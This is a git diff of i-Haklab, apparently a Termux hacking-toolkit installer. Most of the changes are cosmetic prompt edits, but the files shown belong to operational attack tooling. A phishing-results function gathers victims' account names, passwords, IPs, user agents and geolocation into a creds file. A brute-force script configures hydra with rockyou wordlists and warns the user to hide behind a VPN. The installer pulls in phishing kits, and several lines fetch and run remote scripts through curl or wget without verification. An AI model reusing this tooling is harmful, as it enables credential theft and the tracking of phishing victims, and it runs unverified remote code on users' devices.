update logfile

diff --git a/.set/bin/i-Haklab b/.set/bin/i-Haklab
--- a/.set/bin/i-Haklab
+++ b/.set/bin/i-Haklab
@@ -8,14 +8,14 @@ source $iHAKLAB/.set/functions/functions
 ctrl_c(){ printf "$Y\n\n\t\t   [¿] Need a help [?]$B\n\t\tTelegram : t.me/Ivam3_Bot$W\n\n";exit;}
 chk-iHaklab
 chk-Cuser
-[ $# -eq 0 ] && { printf >&2 "$R(_>)─➤$W missing argument, type $(basename $0) -h for help";exit;}
+[ $# -eq 0 ] && { printf >&2 "$R(_➤)$W missing argument, type $(basename $0) -h for help";exit;}
 clear;banner
 case "$1" in
 	-h|help)
 		Menu
 		;;
 	-v|version)
-		printf "$G(_>)─➤$W i-Haklab $(grep -om 1 "v.*.*" $iHAKLAB/README.md|awk '{print $1}') 2021 by Ivam3 - It is a hacking laboratory that contains open source tools recommended by Ivam3."
+		printf "$G(_➤)$W i-Haklab $(grep -om 1 "v.*.*" $iHAKLAB/README.md|awk '{print $1}') 2021 by Ivam3 - It is a hacking laboratory that contains open source tools recommended by Ivam3."
 		;;
 	about)
 		[[ -e $iHAKLAB/.set/libexec/Tools/Readme/$2 ]] && cat $iHAKLAB/.set/libexec/Tools/Readme/$2 || STDERR
@@ -34,7 +34,7 @@ case "$1" in
 				then
 					bash <(curl -fsSL "${iHDB}/share/$1") $i
 				else
-						printf >&2 "$R(_>)─➤$W Tool $i doesn't exist in i-Haklab$Y\n ╰─➤$W Trying APT repositories...\n"
+						printf >&2 "$R(_➤)$W Tool $i doesn't exist in i-Haklab$Y\n ╰─➤$W Trying APT repositories...\n"
 						yes|apt $1 $i
 				fi
 			done
@@ -45,16 +45,16 @@ case "$1" in
 	  inactive(){
 			if [[ $(ruby -v |cut -c 6-10) != "2.7.2" ]]
 			then
-				printf "$Y\n(_>)─➤$W Downgrading ruby at version 2.7.2.."
+				printf "$Y\n(_➤)$W Downgrading ruby at version 2.7.2.."
 				bash <(curl -fsSL "http://git.io/abhacker-repo") --install ruby=2.7.2
 				if [ ! -e $PREFIX/etc/apt/sources.list.d/abhacker.repo.list ]
 				then
-					printf "$Y\n(_>)─➤$W Installing Abhacker repositories..$G"
+					printf "$Y\n(_➤)$W Installing Abhacker repositories..$G"
 					wget -q "${iHDB}/fix-tools/instAbhackerRepo" -O $TMPDIR/abh.tmp
 					chmod +x $TMPDIR/abh.tmp
 					exec $TMPDIR/abh.tmp --install ruby=2.7.2 >/dev/null 2>/dev/null
 					rm $TMPDIR/abh.tmp
-					printf "$G(_>)─➤$W DONE!!\n"
+					printf "$G(_➤)$W DONE!!\n"
 				else
 					exec yes|apt install ruby=2.7.2 >/dev/null 2>/dev/null
 				fi
@@ -68,13 +68,13 @@ case "$1" in
 		fi
 		;;
 	restore)
-		printf "$Y(_>)─➤$W Restoring (It could take a while)..";
+		printf "$Y(_➤)$W Restoring (It could take a while)..";
 		rm -rf $iHAKLAB
 		git clone --quiet https://github.com/Ivam3/i-Haklab $iHAKLAB
 		if [[ -d $iHAKLAB ]];then
 			printf "$G. DONE!!$W\n"
 		else
-			printf "$R\n(_>)─➤ ERR_restore";ctrl_c
+			printf "$R\n(_➤) ERR_restore";ctrl_c
 		fi
 		;;
 	reinstall)
@@ -90,7 +90,7 @@ case "$1" in
 	speedtest)
 		command -v python >/dev/null || yes|apt install python >/dev/null 2>&1
 		command -v speedtest-cli >/dev/null || python -m pip install --no-color --quiet --no-cache-dir speedtest-cli
-		printf "$Y(_>)─➤$W Running speed test.\n"
+		printf "$Y(_➤)$W Running speed test.\n"
 		speedtest-cli
 		;;
 	update)
@@ -105,14 +105,14 @@ case "$1" in
 			if [[ $LDAY -gt $RDAY ]];then
 				Done
 			else
-				printf "$G(_>)─➤$W Upgrading i-Haklab...\n"
+				printf "$G(_➤)$W Upgrading i-Haklab...\n"
 				bash $TMP_FILE1
 				Done
 			fi
 		elif [[ $LMONTH -gt $RMONTH ]]; then
 			Done
 		else
-			printf "$Y(_>)─➤$W Upgrading i-Haklab...\n"
+			printf "$Y(_➤)$W Upgrading i-Haklab...\n"
 			bash $TMP_FILE1
 			Done
 		fi
@@ -143,7 +143,7 @@ printf "$Y(_>)─>$W if this is your first time using weechat: after start weech
 	/join #Ivam3byCinderella$G\n\n                 Press enter to start$W\n"
 	                read enter
 		else
-			printf "$Y(_>)─➤$W After weechat started type the command :$G /connect freenode$W\n                 Press$G enter$W to start$W\n";read enter
+			printf "$Y(_➤)$W After weechat started type the command :$G /connect freenode$W\n                 Press$G enter$W to start$W\n";read enter
 		fi
 		weechat;k-boom
 		;;
diff --git a/.set/functions/functions b/.set/functions/functions
--- a/.set/functions/functions
+++ b/.set/functions/functions
@@ -4,11 +4,12 @@
 iHAKLAB=/data/data/com.termux/files/home/.local/share/i-Haklab
 
 banner() {
-	if [ ! -e $iHAKLAB/.set/libexec/banner/i-Haklab ]; then
+	if [[ ! -e $iHAKLAB/.set/libexec/banner/i-Haklab ]]
+	then
 		wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/libexec/banner/i-Haklab -O $iHAKLAB/.set/libexec/banner/i-Haklab > /dev/null 2>&1
 	fi
-        bash $iHAKLAB/.set/libexec/banner/i-Haklab
-        sleep 0.5
+	bash $iHAKLAB/.set/libexec/banner/i-Haklab
+  sleep 0.5
 }
 export -f banner
 
@@ -21,29 +22,38 @@ k-boom() {
 export -f k-boom
 
 running(){
-        for i in . .. ... ....;do
-                printf "$G$(clear)(_>)─➤ i-Haklab running $i\n$W"
-                sleep 0.1
-        done
+	sleep $1 &
+	pid=$!
+  spinner=( '█■■■■' '■█■■■' '■■█■■' '■■■█■' '■■■■█' )
+  while [ "$(ps a|awk '{print $1}'|grep $pid)" ]; do
+		for i in "${spinner[@]}";do
+			tput civis
+			printf  "$green\r(_➤) Searching\t$i\b\b\b\b\b\b\b\b";
+			sleep 0.25
+    done
+  done
+  tput cnorm
+  printf "\t$W[$G¡RUN!$W]\n";
 }
 export -f running
 
-STDERROOT(){ printf "$R\n(_>)─➤$W Rooted device required";exit;}
+STDERROOT(){ printf "$R\n(_➤)$W Rooted device required";exit;}
 export -f STDERROOT
 
-STDERR(){ printf "$R(_>)─➤$W missing argument, type i-Haklab -h for help";exit;}
+STDERR(){ printf "$R(_➤)$W missing argument, type i-Haklab -h for help";exit;}
 export -f STDERR
 
 APTupdate(){
 	for count in {1..4};do
-		if [[ $(apt update|grep "All packages are up to date.") ]]
+		if [[ $(apt update|grep "All packages are up to date.") ]] &>/dev/null
 		then
+			echo "All packages are up to date."
 			break
-		elif [[ count -eq 3 ]]
-    then
-			printf "$R\n(_>)─➤ APT ERROR$W |$Y try using IbyC-fixer$W";exit
+		elif [[ $count -eq 3 ]]; then
+			printf "$R\n(_➤) APT ERROR$W |$Y try using IbyC-fixer$W"
+			break
     else
-			yes|apt upgrade
+			yes|apt upgrade &>/dev/null
 		fi
 	done
 }
@@ -51,15 +61,15 @@ export -f APTupdate
 
 chk-iHaklab() {
 	until [ -d $iHAKLAB ]; do
-		printf "$R\n(_>)─➤ i-Haklab needed$W |$Y Do you wanna install it?$W\n"
+		printf "$R\n(_➤) i-Haklab needed$W |$Y Do you wanna install it?$W\n"
         	while read -p "(yes/no)─➤ " yesorno && [ -z $yesorno ]; do
                 	continue
         	done
         	if [ $yesorno = "yes" ] || [ $yesorno = "Yes" ] || [ $yesorno = "YES" ]; then
-                	git clone https://github.com/ivam3/i-Haklab.git $HOME/i-Haklab
-                	cd ~/i-Haklab;bash setup-lite
+                	git clone --quiet https://github.com/ivam3/i-Haklab.git $HOME/i-Haklab
+                	cd ~/i-Haklab;bash setup
         	else
-                	printf "$Goke\n(_>)─➤ Have a nice hacking day!!\n$W"
+                	printf "$Goke\n(_➤) Have a nice hacking day!!\n$W"
                 	exit
         	fi
 	done
@@ -68,7 +78,7 @@ export -f chk-iHaklab
 
 chk-Cuser() {
 	while [ ! $(id -u) -ne 0 ]; do
-        	printf "$R\n(_>)─➤$W You need to be a common user\n"
+        	printf "$R\n(_➤)$W You need to be a common user\n"
         	exit
 	done
 }
@@ -76,19 +86,19 @@ export -f chk-Cuser
 
 chk-Ruser() {
 	while [ ! $(id -u) -eq 0 ]; do
-		printf "$R\n(_>)─➤ You need to be a root user$W\n"
+		printf "$R\n(_➤) You need to be a root user$W\n"
 		exit
 	done
 }
 export -f chk-Ruser
 
 chk-api() {
-        command -v termux-open > /dev/null || { printf "$R(_>)─➤$W termux-tools needed$R |$W run i-Haklab install termux-tools"; exit; }
+        command -v termux-open > /dev/null || { printf "$R(_➤)$W termux-tools needed$R |$W run i-Haklab install termux-tools"; exit; }
 }
 export -f chk-api
 
 chk-sudo() {
-        command -v sudo > /dev/null || { printf "$R(_>)─➤$W sudo command needed$R |$W please install it"; exit; }
+        command -v sudo > /dev/null || { printf "$R(_➤)$W sudo command needed$R |$W please install it"; exit; }
 }
 export -f chk-sudo
 
@@ -104,39 +114,39 @@ export -f chk-root
 
 chk-network(){
         until ping -q -c1 -W 1 8.8.8.8 >/dev/null 2>/dev/null;do
-		printf "$R(_>)─➤ Please connect to internet$W\n"
+		printf "$R(_➤) Please connect to internet$W\n"
 		exit
 	done
 }
 export -f chk-network
 
 chk-msf() {
-        command -v msfconsole > /dev/null || { printf "$R\n(_>)─➤$W Metasploit needed$R |$W run i-Haklab install metasploit";exit; }
+        command -v msfconsole > /dev/null || { printf "$R\n(_➤)$W Metasploit needed$R |$W run i-Haklab install metasploit";exit; }
 }
 export -f chk-msf
 
 chk-java() {
-command -v java >/dev/null || { printf "$R\n(_>)$W java needed$R |$W run i-Haklab install java";exit; }
+         command -v java >/dev/null || { printf "$R\n(_>)$W java needed$R |$W run i-Haklab install java";exit; }
 }
 export -f chk-java
 
 chk-php() {
-        command -v php > /dev/null || { printf "$R\n(_>)─➤$W php not found$R |$W run i-Haklab install php"; exit; }
+        command -v php > /dev/null || { printf "$R\n(_➤)$W php not found$R |$W run i-Haklab install php"; exit; }
 }
 export -f chk-php
 
 chk-ssh() {
-        command -v ssh > /dev/null || { printf "$R\n(_>)─➤$W ssh not found$R |$W run i-Haklab install openssh"; exit; }
+        command -v ssh > /dev/null || { printf "$R\n(_➤)$W ssh not found$R |$W run i-Haklab install openssh"; exit; }
 }
 export -f chk-ssh
 
 chk-mega() {
-        command -v megadl > /dev/null || { printf "$R\n(_>)─➤$W megatools not found$R |$W run i-Haklab install megatools"; exit; }
+        command -v megadl > /dev/null || { printf "$R\n(_➤)$W megatools not found$R |$W run i-Haklab install megatools"; exit; }
 }
 export -f chk-mega
 
 chk-hydra() {
-        command -v hydra > /dev/null || { printf "$R\n(_>)─➤$W hydra not found$R |$W run i-Haklab install hydra"; exit; }
+        command -v hydra > /dev/null || { printf "$R\n(_➤)$W hydra not found$R |$W run i-Haklab install hydra"; exit; }
 }
 export -f chk-hydra
 
@@ -151,7 +161,7 @@ chk-tunnel() {
 	elif ping -q -c 1 -W 1 serverless.social >/dev/null 2>&1;then
 		TUNNEL="serverless.social"
 	else
-		printf "$R\n(_>)─➤$W Server not available$R |$W try it later\n"
+		printf "$R\n(_➤)$W Server not available$R |$W try it later\n"
 		exit
 	fi
 }
@@ -163,7 +173,7 @@ chk-snow() {
 export -f chk-snow
 
 Menu() {
-	printf "$Y\n(_>)─➤$W i-Haklab v.3.0 (c) 2021 by @Ivam3 - Is a hacking laboratory that contains open source tools recommended by Ivam3. If the law is violated with it's use, this would be the responsibility of the user who handled it.\n$Y\nSyntax:$W i-Haklab [-arg-] [-option-]\n
+	printf "$Y\n(_➤)$W i-Haklab $version (c) 2021 by @Ivam3 - Is a hacking laboratory that contains open source tools recommended by Ivam3. If the law is violated with it's use, this would be the responsibility of the user who handled it.\n$Y\nSyntax:$W i-Haklab [-arg-] [-option-]\n
 $Y OPTIONS$W|$Y   Arguments$W   |$Y    Description$W
 ╰─about─────+──<name─of─tool>───➤ Show informations about tool/framework
 |   ╰───example─────────────────{─i-Haklab about crunch─}
@@ -314,13 +324,13 @@ export -f trimString
 phishing-CredsResults() {
 	ACCOUNT=$(grep -o 'Account:.*' $TMP_PATH/usernames.txt | cut -d " " -f2)
 	if [ ! -z $ACCOUNT ]; then
-		printf "$G\n(_>)─➤ ACCOUNT:$W$ACCOUNT"
+		printf "$G\n(_➤) ACCOUNT:$W$ACCOUNT"
 		echo $ACCOUNT >> $TMP_PATH/creds.txt
 		sleep 0.5
 	fi
 	PASSWD=$(grep -o 'Pass:.*' $TMP_PATH/usernames.txt | cut -d " " -f2)
 	if [ ! -z $PASSWD ]; then
-		printf "$G\n(_>)─➤ PASSWORD:$W$PASSWD"
+		printf "$G\n(_➤) PASSWORD:$W$PASSWD"
 		echo $PASSWD >> $TMP_PATH/creds.txt
 		sleep 0.5
 	fi
@@ -332,62 +342,62 @@ IP=$(grep -a 'IP:' $TMP_PATH/ip.txt | cut -d " " -f2 | tr -d '\r' | head -n1)
 IPTRACKER=$(curl -s -L "www.ip-tracker.org/locator/ip-lookup.php?ip=$IP" --user-agent "Mozilla/5.0 (X11: Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > $TMP_PATH/iptracker.log)
 
 if [ ! -z $IP ]; then 
-	printf "$G\n(_>)─➤ IP:$W$IP"
+	printf "$G\n(_➤) IP:$W$IP"
 	echo $IP >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 
 UA=$(grep 'User-Agent:' $TMP_PATH/ip.txt | cut -d '"' -f2 | head -n1 | awk '{print $1 $2 $3 $4 $5 $6}')
 if [ ! -z $UA ]; then
-	printf "$G\n(_>)─➤ User Agent$W$UA"
+	printf "$G\n(_➤) User Agent$W$UA"
 	echo $UA >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 IP_SPEED=$(grep -o "IP Address Speed:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [ ! -z '$IP_SPEED' ]; then
-	printf "$G\n(_>)─➤ IP Address speed:$W$IP_SPEED"
+	printf "$G\n(_➤) IP Address speed:$W$IP_SPEED"
 	echo $IP_SPEED >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 IP_CURRENCY=$(grep -o "IP Currency:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [ ! -z '$IP_CURRENCY' ]; then
-	printf "$G\n(_>)─➤ IP Currency:$W$IP_CURRENCY"
+	printf "$G\n(_➤) IP Currency:$W$IP_CURRENCY"
 	echo $IP_CURRENCY >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 CONTINENT=$(grep -o "Continent.*" $TMP_PATH/iptracker.log | cut -d ">" -f3 | cut -d "<" -f1)
 if [ ! -z '$CONTINENT' ]; then
-	printf "$G\n(_>)─➤ Continent:$W$CONTINENT"
+	printf "$G\n(_➤) Continent:$W$CONTINENT"
 	echo $CONTINENT >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 COUNTRY=$(grep -o "Country:.*" $TMP_PATH/iptracker.log | cut -d ">" -f3 | cut -d "&" -f1)
 if [ ! -z $COUNTRY ]; then
-	printf "$G\n(_>)─➤ Country:$W$COUNTRY"
+	printf "$G\n(_➤) Country:$W$COUNTRY"
 	echo $COUNTRY >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 STATE=$(grep -o "tracking lessimpt.*" $TMP_PATH/iptracker.log | cut -d "<" -f1 | cut -d ">" -f2)
 if [ ! -z '$STATE' ]; then
-	printf "$G\n(_>)─➤ State:$W$STATE"
+	printf "$G\n(_➤) State:$W$STATE"
 	echo $STATE >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 CITY=$(grep -o "City Location:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [ ! -z $CITY ]; then
-	printf "$G\n(_>)─➤ City:$W$CITY"
+	printf "$G\n(_➤) City:$W$CITY"
 	echo $CITY >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 ISP=$(grep -o "ISP:.*" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [ ! -z $ISP ]; then
-	printf "$G\n(_>)─➤ ISP:$W$IPS"
+	printf "$G\n(_➤) ISP:$W$IPS"
 	echo $ISP >> $TMP_PATH/creds.txt
 	sleep 0.5
 fi
 AS_NUM=$(grep -o "AS Number" $TMP_PATH/iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [ ! -z '$AS_NUM' ]; then
-	printf  "$G\n(_>)─➤ AS Number:$W$AS_NUM"
+	printf  "$G\n(_➤) AS Number:$W$AS_NUM"
 	echo $AS_NUM >> $TMP_PATH/creds.txt
 	sleep 0.5 
 fi
diff --git a/.set/share/bf b/.set/share/bf
--- a/.set/share/bf
+++ b/.set/share/bf
@@ -5,28 +5,28 @@ source $iHAKLAB/.set/functions/functions
 chk-hydra
 
 if [[ ! -d $iHAKLAB/wordlist ]];then
-	printf "$G(_>)─➤$W Installing dependencies and wordlist...{$Y it could take a while $W}\n"
+	printf "$G(_➤)$W Installing dependencies and wordlist...{$Y it could take a while $W}\n"
 	command -v git >/dev/null || yes|apt install git
 	git clone --quiet https://github.com/jeanphorn/wordlist $iHAKLAB/wordlist
 fi
 if [[ ! -e $iHAKLAB/wordlist/rockyou.txt ]];then
-	printf "$G(_>)─➤$W Installing wordlist rockyou...{$Y it could take a while $W}\n"
+	printf "$G(_➤)$W Installing wordlist rockyou...{$Y it could take a while $W}\n"
 	wget -q https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt -O $iHAKLAB/wordlist/rockyou.txt
 fi
-STDERR(){ printf "$R(_>)─➤$W missing argument, type i-Haklab -h for help";exit;}
+STDERR(){ printf "$R(_➤)$W missing argument, type i-Haklab -h for help";exit;}
 alert(){ printf "\n\t       $R(_>)─> USE SOME VPN <─(<_)$W\n\t\t  press$G enter$W to start\n";read enter;}
 setTarget(){
 	printf "$Y(_>)_set_host:─➤ ";read target
-	[[ -z $target ]] && { printf 2>&1 "$R(_>)─➤$W Host not specified... Aborting\n";exit;}
+	[[ -z $target ]] && { printf 2>&1 "$R(_➤)$W Host not specified... Aborting\n";exit;}
 }
 setuserWL(){
 	printf "$Y(_>)_user_wordlist_{$W default: usernames.txt $Y}\n ╰─────➤ ";read usernames
-	[[ -e $usernames ]] || { printf 2>&1 "$R(_>)─➤$W file doesn't exists. Using default.$W\n";}
+	[[ -e $usernames ]] || { printf 2>&1 "$R(_➤)$W file doesn't exists. Using default.$W\n";}
 	userWL=${usernames:-$iHAKLAB/wordlist/usernames.txt}
 }
 setWordlist(){
 	printf "$Y(_>)_password_wordlist_{$W default: rockyou.txt $Y}\n ╰─────➤ ";read wordlist
-	[[ -e $wordlist ]] || { printf 2>&1 "$R(_>)─➤$W file doesn't exists. Using default.$W\n";}
+	[[ -e $wordlist ]] || { printf 2>&1 "$R(_➤)$W file doesn't exists. Using default.$W\n";}
 	wordlist=${wordlist:-$iHAKLAB/wordlist/rockyou.txt}
 }
 
diff --git a/.set/share/forwarding b/.set/share/forwarding
--- a/.set/share/forwarding
+++ b/.set/share/forwarding
@@ -6,10 +6,10 @@ source $iHAKLAB/.set/functions/functions
 if [ $SSH = "1" ]; then
 	killall -2 ssh > /dev/null 2>&1
 fi
-[[ $(command -v lt) ]] || { printf >&2 "$R\n(_>)─➤ ERROR :$W Localtunnel-server is not installed\n";exit;}
+[[ $(command -v lt) ]] || { printf >&2 "$R\n(_➤) ERROR :$W Localtunnel-server is not installed\n";exit;}
 default(){ config;$(command -v lt) -h "http://$TUNNEL" -p $LPORT --print-requests;}
 subdomain(){ config;$(command -v lt) -h "http://$TUNNEL" -p $LPORT -s $SUBDOMAIN --print-requests;}
-config(){ printf "$Y\n(_>)_USAGE─➤$W i-Haklab forwarding <port/domain>$G\n(_>)_PORT─➤$W $LPORT$G\n(_>)_DOMAIN─➤$W $SUBDOMAIN$G\n(_>)─➤$W ";}
+config(){ printf "$Y\n(_>)_USAGE─➤$W i-Haklab forwarding <port/domain>$G\n(_>)_PORT─➤$W $LPORT$G\n(_>)_DOMAIN─➤$W $SUBDOMAIN$G\n(_➤)$W ";}
 chk-tunnel
 if [ "$2" -eq "$2" ] 2>/dev/null && [ $3 ]
 then
diff --git a/.set/share/install b/.set/share/install
--- a/.set/share/install
+++ b/.set/share/install
@@ -7,8 +7,8 @@ source $HOME/.local/share/i-Haklab/.set/var/variables
 source $iHAKLAB/.set/functions/functions
 toInstall="$1"
 ctrl_c(){ printf "\n$Y\n   (¿) Need a help (?)$B\nTelegram : t.me/Ivam3_Bot$W\n";}
-Err() { printf "$R\n(_>)─➤$W Installation failed";ctrl_c;exit;}
-PS(){ printf "$G(_>)─➤$W Installing python modules.\n ╰─────➤$W (it could take a while)...\n";}
+Err() { printf "$R\n(_➤)$W Installation failed";ctrl_c;exit;}
+PS(){ printf "$G(_➤)$W Installing python modules.\n ╰─────➤$W (it could take a while)...\n";}
 PIPup() {
 	for PYv in python2 python ;do
 		$PYv -m pip install --no-color --quiet --upgrade pip
@@ -32,9 +32,9 @@ RUST() {
 	yes|apt purge rust
 }
 PYmodules() {
-	printf "$G(_>)─➤$W There are 3 methods of installing the modules: choose one$Y\n ╰───(01)─➤$W BASIC$Y\n ╰───(02)─➤$W LDFLAGS$Y\n ╰───(03)─➤$W SODIUM$Y\n ╰───(04)─➤$W RUST\n\n"
+	printf "$G(_➤)$W There are 3 methods of installing the modules: choose one$Y\n ╰───(01)─➤$W BASIC$Y\n ╰───(02)─➤$W LDFLAGS$Y\n ╰───(03)─➤$W SODIUM$Y\n ╰───(04)─➤$W RUST\n\n"
 
-	while read -p "(_>)─➤ " ANSW && [ -z $ANSW ]; do
+	while read -p "(_➤) " ANSW && [ -z $ANSW ]; do
 		continue
 	done
 	if [[ $ANSW = '1' ]] || [[ $ANSW = '01' ]]; then
@@ -46,7 +46,7 @@ PYmodules() {
 	elif [[ $ANSW = '4' ]] || [[ $ANSW = '04' ]]; then
 		PS;RUST
 	else
-		printf "$R(_>)─➤$W method $ANSW doesn't exist\n"
+		printf "$R(_➤)$W method $ANSW doesn't exist\n"
 		exit 0
 	fi
 }
@@ -76,9 +76,9 @@ fi
 [[ $toInstall = twifo-cli ]] && toInstall="twifo"
 [[ $toInstall = wfuzz ]] && toInstall="fuzzdb"
 if [[ -d $TOOLS/$toInstall ]] || [[ -e $PREFIX/bin/$toInstall ]] || [[ -e $HOME/.local/bin/$toInstall ]] || [[ -d $PREFIX/opt/$toInstall ]] || [[ -e ~/go/bin/$toInstall ]] || [[ ! -z $login ]];then
-	printf "$R(_>)─➤$W $1 it's already installed";exit
+	printf "$R(_➤)$W $1 it's already installed";exit
 fi
-running
+running 3
 yes|apt autoremove
 APTupdate
 case "$toInstall" in
@@ -101,7 +101,7 @@ case "$toInstall" in
 		#deb http://ftp.debian.org/debian buster main
 		#deb http://ftp.debian.org/debian buster-updates main
 		CONF
-		printf "$G(_>)─➤$W Follow the the next steps$G\t
+		printf "$G(_➤)$W Follow the the next steps$G\t
 		(01)─➤$W run $toInstall < ./start-kali.sh >$G\t
 		(02)─➤$W update $toInstall < apt-get update && apt-get upgrade >$G\t
 		(03)─➤$W start vnc server < vncserver :1 > on this step you have to set a password$G\t
@@ -217,8 +217,8 @@ case "$toInstall" in
 		cat $TOOLS/$toInstall/requirements.txt > $TMPDIR/requirements.txt
 		PYmodules
 		rm -f $TMPDIR/requirements.txt
-		PS3="(_>)─➤ "
-		printf "$Y(_>)─➤$W $toInstall needs an instagram acccount credentials."
+		PS3="(_➤) "
+		printf "$Y(_➤)$W $toInstall needs an instagram acccount credentials."
 		select way in Set_credentials Skip_this_step;do
 			case $way in
 				Set_credentials)
@@ -231,7 +231,7 @@ case "$toInstall" in
 					printf "[Credentials]\nusername = $username\npassword = $passwd" > $TOOLS/$toInstall/config/credentials.ini
 					;;
 				*)
-					printf "$Y(_>)─➤$W Don't forget set your credentials at file: $TOOLS/$toInstall/config/credentials.ini"
+					printf "$Y(_➤)$W Don't forget set your credentials at file: $TOOLS/$toInstall/config/credentials.ini"
 					ctrl_c;exit
 					;;
 			esac
@@ -245,8 +245,8 @@ case "$toInstall" in
 		cat $TOOLS/$toInstall/requirements.txt > $TMPDIR/requirements.txt
 		PYmodules
 		rm -f $TMPDIR/requirements.txt
-		PS3="(_>)─➤ "
-		printf "$Y(_>)─➤$W $toInstall needs an API key from opencagedata.com."
+		PS3="(_➤) "
+		printf "$Y(_➤)$W $toInstall needs an API key from opencagedata.com."
 		select way in Set_credentials Skip_this_step;do
 			case $way in
 				Set_credentials)
@@ -259,7 +259,7 @@ case "$toInstall" in
 					printf "[Credentials]\nusername = $username\npassword = $passwd" > $TOOLS/$toInstall/config/credentials.ini
 					;;
 				*)
-					printf "$Y(_>)─➤$W Don't forget set your credentials at file: $TOOLS/$toInstall/config/credentials.ini"
+					printf "$Y(_➤)$W Don't forget set your credentials at file: $TOOLS/$toInstall/config/credentials.ini"
 					ctrl_c
 					;;
 			esac
@@ -329,7 +329,7 @@ case "$toInstall" in
 		rm -f $TMPDIR/requirements.txt
 		;;
 	seeker)
-		[[ -e $HOME/.local/bin/ngrok.io ]] || { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok is not installed\n";ctrl_c;}
+		[[ -e $HOME/.local/bin/ngrok.io ]] || { printf >&2 "$R\n(_➤) ERROR :$W ngrok is not installed\n";ctrl_c;}
 		yes|apt install git python
 		PIPup
 		PYv=""
@@ -371,8 +371,8 @@ case "$toInstall" in
 		rm -f $TMPDIR/requirements.txt
 		;;
 	sqlmap)
-		printf "$C#::::::::::::::::::::::::::::::::::::#$Y\n(_>)─➤$W Choose a type of installation$G\n(_>)_01─➤$W Python-pip modules$G\n(_>)_02─➤$W Github\n"
-		while read -p "(_>)─➤ " ANSW && [ -z $ANSW ]; do
+		printf "$C#::::::::::::::::::::::::::::::::::::#$Y\n(_➤)$W Choose a type of installation$G\n(_>)_01─➤$W Python-pip modules$G\n(_>)_02─➤$W Github\n"
+		while read -p "(_➤) " ANSW && [ -z $ANSW ]; do
 			continue
 		done
 		if [[ $ANSW = 1 ]] || [[ $ANSW = 01 ]];then
@@ -563,7 +563,7 @@ case "$toInstall" in
 		wget -q $iHDB/fix-tools/searchsploit -O ~/.searchsploit_rc
 		;;
 	lockphish)
-		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok is not installed\n";ctrl_c;}
+		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_➤) ERROR :$W ngrok is not installed\n";ctrl_c;}
 		yes|apt install git wget
 		git clone --quiet https://github.com/JasonJerry/$toInstall $TOOLS/$toInstall
 		rm -f $TOOLS/$toInstall/$toInstall.sh 
@@ -577,11 +577,11 @@ case "$toInstall" in
 			yes|apt install ruby && gem install lolcat
 			sed 's|/data/data/com.termux/files/home/.local/etc/i-Haklab/wall-banner|/data/data/com.termux/files/home/.local/etc/i-Haklab/login-termux|g' -i $INITFILE
 		else
-			printf "$R\n(_>)─➤ Login is already active"
+			printf "$R\n(_➤) Login is already active"
 		fi
 		;;
 	nexphisher)
-		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok is not installed\n";ctrl_c;exit;}
+		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_➤) ERROR :$W ngrok is not installed\n";ctrl_c;exit;}
 		yes|apt install git
 		git clone --quiet https://github.com/htr-tech/$toInstall $TOOLS/$toInstall
 		chmod +x $TOOLS/$toInstall/*
@@ -590,7 +590,7 @@ case "$toInstall" in
 		wget -q $iHDB/fix-tools/$toInstall -O $TOOLS/$toInstall/$toInstall
 		;;
 	saycheese|sayhello)
-		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok is not installed\n";ctrl_c;}
+		[[ -e $PREFIX/bin/ngrok ]] || { printf >&2 "$R\n(_➤) ERROR :$W ngrok is not installed\n";ctrl_c;}
 		yes|apt install wget unzip openssh
 		wget -q $iHDB/to-install/$toInstall.zip -O $TMPDIR/$toInstall.zip
 		unzip -q $TMPDIR/$toInstall.zip -d $TOOLS
@@ -622,7 +622,7 @@ case "$toInstall" in
 		;;
 	burpsuite)
 		[[ -e $PREFIX/bin/java ]] && yes|pkg remove openjdk-17
-		printf "$G\n(_>)─➤ Installing $toInstall (It could take a while)...\n"
+		printf "$G\n(_➤) Installing $toInstall (It could take a while)...\n"
 		wget -q --tries=20 https://github.com/termux/termux-packages/suites/4742204683/artifacts/131051875 -O $TMPDIR/termux-packages-aarch64.zip
 		unzip $TMPDIR/termux-packages-aarch64.zip -d $TM0DIR
 		tar xvf $TMPDIR/debs-aarch64-1e2023f351d547b82494edfb0f5baac0fd490370.tar -O debs/openjdk-17_17.0-17_aarch64.deb > $TMPDIR/openjdk-17_17.0-17_aarch64.deb
@@ -634,9 +634,9 @@ case "$toInstall" in
 #!/usr/bin/bash
 #This file execute a burp suite on Termux:Wayland interface
 #You should install it before to run this scripta
-[[ \$(uname -m) = "aarch64" ]] || { printf >&2 "\$R(_>)─➤\$W Incompatible architecture";exit;}
-[[ -e $TOOLS/burpsuite.jar ]] || { printf >&2 "\$R(_>)─➤\$W Burpsuite is not installed...\$R aborting.\$W";exit;}
-[[ \$(file \$TMPDIR/*|grep -o "socket") >/dev/null ]] || { printf >&2 "\$R(_>)─➤\$W Termux:Wayland server isn't running...\$R aborting.\$W";exit;}
+[[ \$(uname -m) = "aarch64" ]] || { printf >&2 "\$R(_➤)\$W Incompatible architecture";exit;}
